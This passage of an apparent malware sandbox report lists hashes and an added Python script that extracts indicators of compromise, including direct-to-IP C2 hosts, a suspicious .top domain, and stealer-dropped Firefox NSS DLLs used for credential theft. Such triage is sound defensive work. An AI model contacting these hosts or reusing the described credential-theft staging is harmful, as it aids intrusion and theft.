SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

memory/840-252-0x0000000000400000-0x0000000002AF1000-memory.dmp
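
The Network and Files tables above mix indicators worth pivoting on with sandbox and OS housekeeping: reverse lookups of every peer (`*.in-addr.arpa`), resolver traffic to 8.8.8.8, PowerShell's `__PSScriptPolicyTest_*.ps1` and `StartupProfileData` files, CLR usage logs, and in-memory dumps whose hashes are not stable across runs. The script below is an added example covering both tables, not part of the sandbox output: it drops that noise, keeps a DNS-only hostname as an indicator even when no connection followed (a dead C2 is still a C2), separates direct-to-IP port 80 traffic from CDN and vendor hosts, and attaches a triage note to each dropped file. The rows are constructed from the tables above; the vendor allow-list (iolo and Application Insights hosts, assumed to belong to the bundled commercial installer and its telemetry) and the noise list are this editor's assumptions, not a rule shipped with any product.

```python
"""Extract pivotable indicators from the Network and Files tables and drop
sandbox/OS noise. Added example for this report, not sandbox output; rows
are constructed from the tables above, and the vendor allow-list and noise
list are assumptions.
"""
import re

NETWORK_ROWS = """\
US 8.8.8.8:53 d2iv78ooxaijb6.cloudfront.net udp
GB 108.156.32.207:443 d2iv78ooxaijb6.cloudfront.net tcp
US 8.8.8.8:53 207.32.156.108.in-addr.arpa udp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 240429000936002.mjt.kqri92.top udp
BG 94.156.35.76:80 240429000936002.mjt.kqri92.top tcp
DE 185.172.128.90:80 185.172.128.90 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
"""

FILE_ROWS = r"""
C:\Users\Admin\AppData\Local\Temp\nss4EAD.tmp\INetC.dll
MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
memory/4780-18-0x000000007343E000-0x000000007343F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wnlrp5as.1gi.ps1
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
C:\Users\Admin\AppData\Local\Temp\i1.exe
SHA256 a1aa7034c117960e045a7386df698cfaaab3bfd8b13d02bbee56b1e62e67e46f
C:\ProgramData\nss3.dll
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
"""

NET_RE = re.compile(r"^(\w\w) (\S+):(\d+) (\S+) (tcp|udp)$")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-f]+)$")
NSIS_TMP_RE = re.compile(r"\\ns[0-9a-z]{4,6}\.tmp\\", re.I)
# Assumed benign: the bundled commercial installer and its telemetry. Verify before blocking.
VENDOR_SUFFIXES = (".iolo.com", ".iolo.net", ".applicationinsights.azure.com")
# PowerShell/CLR housekeeping written on every run; never indicators.
NOISE_FILES = ("__PSScriptPolicyTest_", "StartupProfileData", r"CLR_v4.0_32\UsageLogs")


def network_iocs(text):
    """Unique indicators keyed by host, or ip:port for direct-to-IP traffic."""
    out = {}
    for line in text.strip().splitlines():
        m = NET_RE.match(line.strip())
        if not m:
            continue
        country, ip, port, name, proto = m.groups()
        if name.endswith(".in-addr.arpa"):
            continue  # sandbox reverse lookups of each peer, not sample behaviour
        dns_only = proto == "udp" and port == "53"
        if IPV4_RE.match(name):
            key, kind = f"{name}:{port}", "direct-ip-http" if port == "80" else "direct-ip"
        elif name.endswith(VENDOR_SUFFIXES):
            key, kind = name, "vendor-or-telemetry"
        elif name.endswith(".cloudfront.net"):
            key, kind = name, "cdn-distribution"  # host is per-distribution; still block the URL path
        else:
            key, kind = name, "domain"
        e = out.setdefault(key, {"indicator": key, "kind": kind, "resolved": None, "contacted": False})
        if not dns_only:  # a DNS-only row is kept above: an unreachable C2 is still an IOC
            e["resolved"], e["contacted"] = f"{ip} ({country})", True
    return list(out.values())


def classify_path(path):
    """Triage note for a dropped file, or None for OS/PowerShell housekeeping."""
    low = path.lower()
    if any(n.lower() in low for n in NOISE_FILES):
        return None
    if "\\programdata\\" in low and low.endswith(("\\nss3.dll", "\\mozglue.dll")):
        return ("Mozilla NSS/mozglue in ProgramData: stealers drop these to decrypt the "
                "Firefox credential store; pivot on path and writing process, not the hash")
    if NSIS_TMP_RE.search(path):
        return "NSIS plugin or script unpacked by the installer stub"
    if low.endswith((".exe", ".dll", ".bat", ".ps1")):
        return "dropped stage or payload"
    return "other dropped file"


def file_iocs(text):
    """Path, hashes and note for files worth pivoting on; memory dumps and noise skipped."""
    out, cur = [], None
    for line in text.strip().splitlines():
        line = line.strip()
        m = HASH_RE.match(line)
        if m and cur is not None:
            cur["hashes"][m.group(1)] = m.group(2)
        elif line and not m:
            note = None if line.startswith("memory/") else classify_path(line)
            cur = {"path": line, "hashes": {}, "note": note} if note else None
            if cur:
                out.append(cur)
    return out


if __name__ == "__main__":
    for e in network_iocs(NETWORK_ROWS):
        print(e)
    for f in file_iocs(FILE_ROWS):
        print(f)
```

On this sample the direct-to-IP port 80 hosts in 185.172.128.0/24 and the `*.kqri92.top` name are the indicators to pivot on first; the CloudFront distribution host is blockable as a hostname because a distribution ID is unique, but the `/load/dl.php?id=...` URLs from the Processes section are the more precise signature. The nss3.dll/mozglue.dll pair in C:\ProgramData is a behavioural indicator (a Firefox credential-theft prerequisite), so match on the path and the process that wrote it rather than on the DLL hash.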